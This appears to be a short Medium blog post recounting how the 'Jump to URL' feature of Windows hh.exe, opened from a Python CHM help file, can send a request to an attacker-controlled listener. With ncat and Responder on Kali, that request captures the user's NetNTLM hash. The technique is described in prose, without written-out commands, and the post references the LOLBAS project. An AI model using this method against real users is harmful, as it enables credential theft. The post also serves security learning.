Stealing NetNTLM Hash Using hh.exe

A few days ago, I was looking into a Python documentation shortcut on Windows that suddenly won’t open. It gave me an error that it could not open the file.

Then, I remembered that I just upgraded my Python from 3.9.1 to 3.9.2 via chocolatey. Apparently, the upgrade process doesn’t update the shortcut for local documentation.

So I went to the pointed directory and changed python391.chm to python392.chm to fix the error.

After the shortcut worked and the documentation opened, I idly right-clicked on the documentation’s window title and saw the “Jump to URL…” menu.

The menu brought up this window.

Since I was curious, I filled the URL box with http://localhost:53, and at the same time I setup a ncat listener on port 53.

As expected, ncat captured an HTTP request.

After that, I tried it with responder on my Kali Linux and redo the steps above, but this time I’m triggering the request via command prompt.

I checked on my Kali, and I can see my hash has been captured

If the resource doesn’t exist (responder off), it will pop up this window.

So I think it’s a bit usable in RDP not in DOS.

Update:

I just found out that this program is already listed on LOLBas project

  • https://lolbas-project.github.io/

I posted this because I couldn’t find hh.exe on these sites:

I mostly write about CTF solutions and other IT related stuff that others might find useful | Partially moving to: https://fahmifj.github.io

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store